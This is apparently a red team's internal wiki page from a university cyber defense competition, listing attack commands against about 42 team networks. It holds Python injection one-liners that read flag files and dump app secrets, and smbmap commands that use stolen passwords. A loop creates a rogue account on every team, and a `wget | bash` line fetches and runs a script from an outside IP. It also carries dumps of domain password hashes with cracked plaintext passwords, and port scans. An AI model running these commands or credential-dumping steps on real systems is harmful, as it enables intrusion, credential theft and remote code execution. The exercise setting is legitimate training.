Red Wiki

Signup Login

Test

import os; os.popen("whoami").read()

os.popen("echo '' > /root/red-flag").read();

os.popen("cat /root/red-flag").read()

os.popen("cat /etc/teamXX_mgmt-etc.flag").read()

import os; print(open('/etc/team17_mgmt-etc.flag').read())

import inspect, flask; apps=list({id(v):v for f in inspect.stack() for v in f.frame.f_locals.values() if isinstance(v, flask.app.Flask)}.values()); apps

app = apps[0]

{k:v for k,v in app.config.items() if "SECRET" in k or "FLAG" in k or "LDAP" in k}

mysql:

use transit; select * from payment_info where username='blue_flag';

Team 1: No Red Assignee

Team 2: No Red Assignee

Team 3: No Red Assignee

Team 4: No Red Assignee

Team 5: No Red Assignee

Team 6: No Red Assignee

Team 7: No Red Assignee

Team 8: No Red Assignee

Team 9: No Red Assignee

Team 10: No Red Assignee

Team 11: No Red Assignee

Team 13: No Red Assignee

Team 14: No Red Assignee

Team 15: No Red Assignee

Team 16: No Red Assignee

Team 17: No Red Assignee

Team 18: No Red Assignee

Team 19: No Red Assignee

Team 20: James Potratz

Team 21: No Red Assignee

Team 22: Austin S.

Team 23: No Red Assignee

Team 24: No Red Assignee

Team 25: No Red Assignee

Team 27: No Red Assignee

Team 29: No Red Assignee

Team 30: No Red Assignee

Team 31: No Red Assignee

Team 32: No Red Assignee

Team 33: No Red Assignee

Team 35: No Red Assignee

Team 37: No Red Assignee

Team 38: No Red Assignee

Team 39: No Red Assignee

Team 40: No Red Assignee

Team 41: No Red Assignee

Team 42: No Red Assignee

Uploaded Files: icdc2026_feb26_gh.zip, team18.png, Screenshot_2026-02-21_11-59-12.png, Screenshot_2026-02-21_11-58-51.png

Debrief Slides: https://docs.google.com/presentation/d/10uX3pnmkFdOcaAntxSWzej8coOFHpciRM7EN1cpdPXE/edit?usp=drive_l...

to get DB Read flag:

```

sudo -s

mysql

use transit; select * from payment_info where username='blue_flag';

```

NOTE: It is NOT the "id"; it is the "card_number"

Will say "DB_FLAG" if it has not been placed yet.

USER GROUPS:

Domain Admins:

- contains "Administratorr", "Domain Users", "Transit Admins"

IT Administrators:

- contains melissa.robles, roger.cox

Ticket Maintenance:

- contains andrea.hall, geoffrey.mitchell

Transit Admins:

- aldo, edward.matt..., joy.newman, tompohl

SMBMap upload flags to windows servers (SMB port 445 required to be open)

smbmap -H ad.team15.isucdc.com -u 'melissa.robles' -p 'doh694kop' -d TEAM15 --upload Downloads/2026-International/all_red_flags/team15/team15_ad-cusersadministrator.flag "C$/Users/Administrator/team15_ad-cusersadministrator.flag"

SMBMAP download flag

smbmap -H ad.team14.isucdc.com -u melissa.robles -p "boz747dat" -d TEAM14 --download "C$/Windows/System32/team14_ad-cwindowssystem32.flag"

I ran this on all teams:

for i in {1..42}; do curl -vk http://www.team$i.isucdc.com/register -d 'username=tompohl&password=Qweasd123!'; done

SMB 73.19.46.10 445 AD [+] team12.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SMB 175.86.94.10 445 AD [+] team18.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SMB 108.64.203.10 445 AD [+] team25.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SMB 82.46.91.10 445 AD [+] team31.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SMB 201.34.64.10 445 AD [+] team35.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SMB 123.65.47.10 445 AD [+] team33.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SMB 185.50.64.10 445 AD [+] team38.isucdc.com\tompohl:Qweasd123! (Pwn3d!)

SHARED CREDS

michael.miranda:erikaa

krystal.gray:oggies
joann.wilson:
leslie.brady:

005e0b342f9956d7d809b312bdc4c63b:edward.matthews:xes782cuv
0108124de880e9e1fd788de4957bc18e:roger.cox:rod000tom
0b03922b6f3ff302f694bc6aa388e148:joy.newman:mal532bey
0c8b46ae8fae8f6a0f6da17b1af2b20e:andrea.hall:rev562wuc
1ecb36708ffddd05443e92d64bf1db23:joy.newman:vuk478veq
21ce2dd4840e04c2fc6b718c92f459b3:melissa.robles:duk808yav
31d6cfe0d16ae931b73c59d7e0c089c0:DefaultAccount:
31d6cfe0d16ae931b73c59d7e0c089c0:Guest:
331fdcf4349b7dd06e8b8e48b8c8ff84:geoffrey.mitchell:liz504yic
3c42a501cba9ad7ae083770ed35e1906:joy.newman:bad401din
461ce20cc29a99ee406c7127712ee7e7:melissa.robles:dun526kus
49e191e30b9b247876e3446464dc9237:roger.cox:bis774hod
52297ffb11c9997f228802fbc80f927c:melissa.robles:fib766teb
5345c6dc64dafc2f5ba48c69870f3761:andrea.hall:loc358tec
5646c8ab88377bb5bc3aaff7189d6085:geoffrey.mitchell:vaz826res
56b98453f23daf8db103efe6607c03c7:michael.miranda:erikaa
5ca1aea2a367758ad1c79b19b687e669:joann.wilson:ucmepn2
5ca9706a5f4fc7611cf32f2a0d1b60f0:joy.newman:wag982lut
5e355e344d218546254dc270321cb014:roger.cox:zuj502kej
62d66ea4550f2c3120f06f84815c23f6:edward.matthews:raw899vif
66d29b8e64fd4cb175090e68b3788c4d:geoffrey.mitchell:nac679feq
6943e63cff940c58d1416dcd52cc497e:melissa.robles:nux669dug
69db2e035bcc33836f3d5963dd4ac230:edward.matthews:yoy352tuy
6aa15b3d14492d3fa4aa7c5e9cdc0e6a:Administrator:cdc
6af3ba8f86110dae17fb2340eb799400:edward.matthews:puv302biv
6c8af32cee576cce1858717ca0146851:leslie.brady:juicec2245
7cd2ebf87559b6bc4af722a370c8e6a7:joy.newman:mox253yah
7ce21f17c0aee7fb9ceba532d0546ad6:team25.isucdc.com\aldo:1234
7e0b7faaaddaca0514cf5114ecc409df:geoffrey.mitchell:mef287bol
8048db8ea1fe32dd0843772021a97bd4:joy.newman:min934xap
8746213931387a23003553c81b54fe93:melissa.robles:fox683dap
9c2de1bea1b1980b3508af55a212f9c2:team18.isucdc.com\lorik:lorik123
a1beae1c6a36a02947dbf09ce82eeb3d:melissa.robles:vax647nuc
a6e1bf681ffd8ed579bf71492cd97326:andrea.hall:dan979mey
af85bdff354376fff3891ef79d7d565f:andrea.hall:req308xay
b21031452ec2080a37b029bbf8c0a0f5:geoffrey.mitchell:mok705mus
b25d1ac37edda5cc80db43c128404291:edward.matthews:sod634suh
b312bb90ba4eb02ae024c8a718e46c38:geoffrey.mitchell:tal337jij
b71a2be76e019d8494eefa48d6f04527:andrea.hall:tob484liv
ba650745227329c714e3ad46408767a1:joy.newman:roh666nox
c102ed8257ee359e41b00011cd284335:edward.matthews:yuv796duf
c2f45ad68737a03f8022143fef2ae02f:geoffrey.mitchell:muk757woj
cf5f5c9b5b5e3e5e1672eeea379a2bb8:roger.cox:hin376yah
d5342cbdff280a448d1ba639092b4e66:roger.cox:loy902xus
d841d8a19df4ab6ff98a66fba1e11dda:edward.matthews:cub590hex
dad0b07ce40425f61f9cb9cafde4ec58:roger.cox:gir274for
dfeb6f127bb73feb4332840960c4c31d:krystal.gray:oggies
f13df073c7bbb949cacdf6267763715f:andrea.hall:tar061jax
f44ee1f450a2fef79fdbb8ab0d54ccd2:roger.cox:huy649zet
fb821e6bf7543dab158af23c02bcddd2:melissa.robles:paw106yun
fce6ba600492e5c2d730158222b8bc43:andrea.hall:hoc528bal

team=1 host=mgmt.team1.isucdc.com open=22/tcp,5000/tcp
team=1 host=www.team1.isucdc.com open=22/tcp,80/tcp
team=2 host=mgmt.team2.isucdc.com open=22/tcp,443/tcp
team=2 host=www.team2.isucdc.com open=22/tcp,443/tcp
team=3 host=mgmt.team3.isucdc.com open=22/tcp,3306/tcp,5000/tcp
team=3 host=www.team3.isucdc.com open=22/tcp,80/tcp,12345/tcp
team=4 host=mgmt.team4.isucdc.com open=22/tcp,53/tcp,80/tcp,5000/tcp
team=4 host=www.team4.isucdc.com open=22/tcp,53/tcp,80/tcp
team=5 host=mgmt.team5.isucdc.com open=22/tcp,5000/tcp
team=5 host=www.team5.isucdc.com open=22/tcp,80/tcp
team=6 host=mgmt.team6.isucdc.com open=22/tcp,5000/tcp
team=6 host=www.team6.isucdc.com open=22/tcp,80/tcp
team=7 host=mgmt.team7.isucdc.com open=22/tcp,5000/tcp
team=7 host=www.team7.isucdc.com open=22/tcp,80/tcp
team=8 host=mgmt.team8.isucdc.com open=22/tcp,5000/tcp
team=8 host=www.team8.isucdc.com open=22/tcp,443/tcp
team=9 host=mgmt.team9.isucdc.com open=22/tcp,5000/tcp
team=9 host=www.team9.isucdc.com open=22/tcp,80/tcp
team=10 host=mgmt.team10.isucdc.com open=22/tcp,5000/tcp
team=10 host=www.team10.isucdc.com open=22/tcp,80/tcp,12345/tcp
team=11 host=mgmt.team11.isucdc.com open=22/tcp
team=11 host=www.team11.isucdc.com open=22/tcp,80/tcp,111/tcp
team=12 host=mgmt.team12.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=12 host=www.team12.isucdc.com open=22/tcp,80/tcp,12345/tcp
team=13 host=mgmt.team13.isucdc.com open=22/tcp,5000/tcp
team=13 host=www.team13.isucdc.com open=22/tcp,80/tcp
team=14 host=mgmt.team14.isucdc.com open=22/tcp,5000/tcp
team=14 host=www.team14.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=15 host=mgmt.team15.isucdc.com open=22/tcp,5000/tcp
team=15 host=www.team15.isucdc.com open=22/tcp,80/tcp
team=16 host=mgmt.team16.isucdc.com open=22/tcp,5000/tcp
team=16 host=www.team16.isucdc.com open=22/tcp,80/tcp
team=17 host=mgmt.team17.isucdc.com open=22/tcp,5000/tcp
team=17 host=www.team17.isucdc.com open=22/tcp,80/tcp,9090/tcp
team=18 host=mgmt.team18.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp,9090/tcp
team=18 host=www.team18.isucdc.com open=22/tcp,80/tcp,111/tcp,9090/tcp,12345/tcp
team=19 host=mgmt.team19.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=19 host=www.team19.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=20 host=mgmt.team20.isucdc.com open=22/tcp,5000/tcp
team=20 host=www.team20.isucdc.com open=22/tcp
team=21 host=mgmt.team21.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=21 host=www.team21.isucdc.com open=22/tcp,80/tcp
team=22 host=mgmt.team22.isucdc.com open=22/tcp,5000/tcp
team=22 host=www.team22.isucdc.com open=22/tcp,80/tcp
team=23 host=mgmt.team23.isucdc.com open=22/tcp,5000/tcp
team=23 host=www.team23.isucdc.com open=22/tcp,80/tcp
team=24 host=mgmt.team24.isucdc.com open=22/tcp,111/tcp,5000/tcp
team=24 host=www.team24.isucdc.com open=22/tcp,80/tcp,111/tcp
team=25 host=mgmt.team25.isucdc.com open=5000/tcp
team=25 host=www.team25.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=26 host=mgmt.team26.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=26 host=www.team26.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=27 host=mgmt.team27.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=27 host=www.team27.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=28 host=mgmt.team28.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=28 host=www.team28.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=29 host=mgmt.team29.isucdc.com open=22/tcp,5000/tcp
team=29 host=www.team29.isucdc.com open=22/tcp,80/tcp,111/tcp
team=30 host=mgmt.team30.isucdc.com open=22/tcp,5000/tcp
team=30 host=www.team30.isucdc.com open=22/tcp,80/tcp
team=31 host=mgmt.team31.isucdc.com open=22/tcp,5000/tcp,9090/tcp
team=31 host=www.team31.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=32 host=mgmt.team32.isucdc.com open=22/tcp,3306/tcp,5000/tcp
team=32 host=www.team32.isucdc.com open=22/tcp,80/tcp,443/tcp
team=33 host=mgmt.team33.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=33 host=www.team33.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=34 host=mgmt.team34.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=34 host=www.team34.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=35 host=mgmt.team35.isucdc.com open=22/tcp,5000/tcp
team=35 host=www.team35.isucdc.com open=22/tcp,80/tcp,12345/tcp
team=36 host=mgmt.team36.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=36 host=www.team36.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=37 host=mgmt.team37.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=37 host=www.team37.isucdc.com open=22/tcp,80/tcp,111/tcp
team=38 host=mgmt.team38.isucdc.com open=22/tcp,111/tcp,3306/tcp,5000/tcp
team=38 host=www.team38.isucdc.com open=22/tcp,80/tcp,111/tcp,12345/tcp
team=39 host=mgmt.team39.isucdc.com open=22/tcp,5000/tcp
team=39 host=www.team39.isucdc.com open=22/tcp,80/tcp
team=40 host=mgmt.team40.isucdc.com open=22/tcp,80/tcp,5000/tcp
team=40 host=www.team40.isucdc.com open=22/tcp,80/tcp
team=41 host=mgmt.team41.isucdc.com open=22/tcp,5000/tcp
team=41 host=www.team41.isucdc.com open=22/tcp,80/tcp,12345/tcp
team=42 host=mgmt.team42.isucdc.com open=22/tcp,5000/tcp
team=42 host=www.team42.isucdc.com open=22/tcp,80/tcp,111/tcp

bash -c 'wget -q -O - http://49.10.219.164/deploy-all.sh | bash'

mysql -u root -B -D transit -e "select card_number from payment_info where username = 'blue_flag'; update vehicles set status=0 where status=1;select * from vehicles;" | column -t

=========================================
📁 Folder: ./team10
📄 File: secretdumps.txt
=========================================
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Admin\Administrator:500:aad3b435b51404eeaad3b435b51404ee:f13ee5e340a7e35220a847c6ed2e417b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8a9438713a9400f3c208685c251dc577:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:8cffd0866b2987f9f13795d99a890824:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:118228960d02d685315be08ee8fd33ed:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:a64427aeb023f7d60d15b7d4ab52115e:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:f2d84ef5cb00583a7f0ad4e049bf38b6:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:b4f743be62e1c402019ae04f3de7465a:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:dec1ef632ea67264c7ace751b0025d2c:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
itadmin1:1127:aad3b435b51404eeaad3b435b51404ee:e6b5b218141f2bddf59c4315b70ec751:::
team10.isucdc.com\admin-backup:2101:aad3b435b51404eeaad3b435b51404ee:f386ec8f8c399382822a64aafac799fa:::
team10.isucdc.com\babastar:2104:aad3b435b51404eeaad3b435b51404ee:3b1b47e42e0463276e3ded6cef349f93:::
team10.isucdc.com\sam:3108:aad3b435b51404eeaad3b435b51404ee:8b2da06b3c2936a1bc988b4dcccc18b2:::
team10.isucdc.com\sarah:3109:aad3b435b51404eeaad3b435b51404ee:0c26eda8f58130f92090f35453c48ae8:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:73188f611971f148011f7d894bd72091:::
WIN-1MTF2UIC2KK$:1117:aad3b435b51404eeaad3b435b51404ee:6d6177d88018468b6dd439ffa9594c5a:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:c5460f84ae277a1872d6e9f487f17ce0:::
ADMIN$:1119:aad3b435b51404eeaad3b435b51404ee:6aa17b1c98fe28fc3890ea3481b5b3b9:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:538b58beb6795c95102591fb77ce6ea8:::
TICKET$:3105:aad3b435b51404eeaad3b435b51404ee:9e71e8181b55da05ca02840898b937ac:::
[*] Cleaning up...

melissa.robles zut973kuy 8cffd0866b2987f9f13795d99a890824
roger.cox pod981nek 118228960d02d685315be08ee8fd33ed
edward.matthews min182kax a64427aeb023f7d60d15b7d4ab52115e
joy.newman mim136run f2d84ef5cb00583a7f0ad4e049bf38b6
andrea.hall suz965lup b4f743be62e1c402019ae04f3de7465a
geoffrey.mitchell kic038yac dec1ef632ea67264c7ace751b0025d2c
babastar test1234 3b1b47e42e0463276e3ded6cef349f93
sam sam12345 8b2da06b3c2936a1bc988b4dcccc18b2
sarah sarah12345 0c26eda8f58130f92090f35453c48ae8

=========================================
📁 Folder: ./team15
📄 File: secretdumps.txt
=========================================
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ff59ea88342e12c3d174fad492679275:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7517df16085cd6675884bb3ac5586b9c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:fe289db136ad4fc19b02bd32a73b30c3:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:64fbc86a77c0d4154070093c8c511397:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:a6a1440e2dc6ba4f7187ea7054340202:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:3b6acde2a52b85cc7478a0cf5c3910b9:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:4775505f379d8458e38134311011e815:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:ae147504baa65f6cb532a3617a375497:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team15.isucdc.com\webloginsvc:1133:aad3b435b51404eeaad3b435b51404ee:576b03ea421ac37ef7724f00b7184a6b:::
team15.isucdc.com\123:1134:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
team15.isucdc.com\tompohl:1135:aad3b435b51404eeaad3b435b51404ee:2ed14c09e4342b6697ad42b04ed86068:::
team15.isucdc.com\kilroy:1136:aad3b435b51404eeaad3b435b51404ee:85c41b2c2346f33b299470a52bbd54d7:::
team15.isucdc.com\sam:1137:aad3b435b51404eeaad3b435b51404ee:8b2da06b3c2936a1bc988b4dcccc18b2:::
team15.isucdc.com\sarah:1138:aad3b435b51404eeaad3b435b51404ee:0c26eda8f58130f92090f35453c48ae8:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:a2f61c7a2d3b4f28fac2f5709c432ac4:::
TICKETS$:1117:aad3b435b51404eeaad3b435b51404ee:082557997c3955570ec61304b3951827:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:610659996636203f8b779997373688d4:::
ADMIN$:1119:aad3b435b51404eeaad3b435b51404ee:fdc7990ae69e59c78ded0cdea8ed6065:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:f6a06d4796f0323ba4c1e3fc227c292b:::
[*] Cleaning up...

sam sam12345 8b2da06b3c2936a1bc988b4dcccc18b2
sarah sarah12345 0c26eda8f58130f92090f35453c48ae8
tompohl Qweasd123! 2ed14c09e4342b6697ad42b04ed86068
123 123 3dbde697d71690a769204beb12283678
geoffrey.mitchell rev062cab ae147504baa65f6cb532a3617a375497
andrea.hall zut726guk 4775505f379d8458e38134311011e815
joy.newman mik164vuv 3b6acde2a52b85cc7478a0cf5c3910b9
roger.cox yup319mil 64fbc86a77c0d4154070093c8c511397
edward.matthews cac219qiq a6a1440e2dc6ba4f7187ea7054340202
melissa.robles doh694kop fe289db136ad4fc19b02bd32a73b30c3

=========================================
📁 Folder: ./team18
📄 File: secretdumps.txt
=========================================
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58ce01bec99dc0604c48d5ea1362d60c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:6943e63cff940c58d1416dcd52cc497e:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:49e191e30b9b247876e3446464dc9237:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:c102ed8257ee359e41b00011cd284335:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:5ca9706a5f4fc7611cf32f2a0d1b60f0:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:af85bdff354376fff3891ef79d7d565f:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:331fdcf4349b7dd06e8b8e48b8c8ff84:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team18.isucdc.com\MelosKqiku:1121:aad3b435b51404eeaad3b435b51404ee:b25e410fbce58fbe5b235778ca86ce2c:::
team18.isucdc.com\lorik:1122:aad3b435b51404eeaad3b435b51404ee:9c2de1bea1b1980b3508af55a212f9c2:::
team18.isucdc.com\tompohl:1123:aad3b435b51404eeaad3b435b51404ee:2ed14c09e4342b6697ad42b04ed86068:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:15c488e7ff11afefe935e30dc5ad6ddb:::
TICKETS$:1117:aad3b435b51404eeaad3b435b51404ee:2007812b4256df54995c649c264c1d5b:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:f45b501b4da87a726ed5d14b476c09cc:::
WIN-GVCAVB1E38T$:1119:aad3b435b51404eeaad3b435b51404ee:8bec370cb5b97f61ea3c406c56b5ac85:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:49f1ad78a0c47699da972bfa15c81e0c:::
[*] Cleaning up...

tompohl Qweasd123! 2ed14c09e4342b6697ad42b04ed86068
lorik lorik123 9c2de1bea1b1980b3508af55a212f9c2
geoffrey.mitchell liz504yic 331fdcf4349b7dd06e8b8e48b8c8ff84
andrea.hall req308xay af85bdff354376fff3891ef79d7d565f
joy.newman wag982lut 5ca9706a5f4fc7611cf32f2a0d1b60f0
edward.matthews yuv796duf c102ed8257ee359e41b00011cd284335
roger.cox bis774hod 49e191e30b9b247876e3446464dc9237
melissa.robles nux669dug 6943e63cff940c58d1416dcd52cc497e
Administrator cdc 6aa15b3d14492d3fa4aa7c5e9cdc0e6a

=========================================
📁 Folder: ./team22
📄 File: secretdumps.txt
=========================================
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf75a32baf8b5405916b69035469d855:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0ee0a40b55ebe4e13f155429012bf031:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:c82a791957fc5e6fcc4098c0b7b71326:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:6d936490e906ab3cb86cc21f3dd469f2:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:dcd5072de595c8dd679bd68e17f873e9:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:e6b09f8e0e84b89b6d64807c3168f98b:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:bbd782b0452616651c71ca688a2a3e93:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:e87e42c53256b51c248a7d882d0f2cb4:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team22.isucdc.com\greenteamlumi:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\asdasd:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\greenteamtestlum:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\signupyeah:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
WIN-1MTF2UIC2KK$:1117:aad3b435b51404eeaad3b435b51404ee:5d58ac87905703ebc819560d292e719c:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:7c37d3f00124afe2a04ec7514a6a2e0e:::
WIN-GVCAVB1E38T$:1119:aad3b435b51404eeaad3b435b51404ee:94e94bc4538134c8b16c5b8774143b01:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:5c9ef24748bfe219de3d8aab01aeb751:::
[*] Cleaning up...

Administrator cdc 6aa15b3d14492d3fa4aa7c5e9cdc0e6a
melissa.robles dup992roc c82a791957fc5e6fcc4098c0b7b71326
roger.cox buy512voy 6d936490e906ab3cb86cc21f3dd469f2
edward.matthews sol768wop dcd5072de595c8dd679bd68e17f873e9
andrea.hall bek977vud bbd782b0452616651c71ca688a2a3e93
joy.newman got767dec e6b09f8e0e84b89b6d64807c3168f98b
geoffrey.mitchell kuy868zaj e87e42c53256b51c248a7d882d0f2cb4
leslie.brady juicec2245 6c8af32cee576cce1858717ca0146851

Red Wiki

Competition Information

Flag Locations

Team Wiki Pages

General Help and Information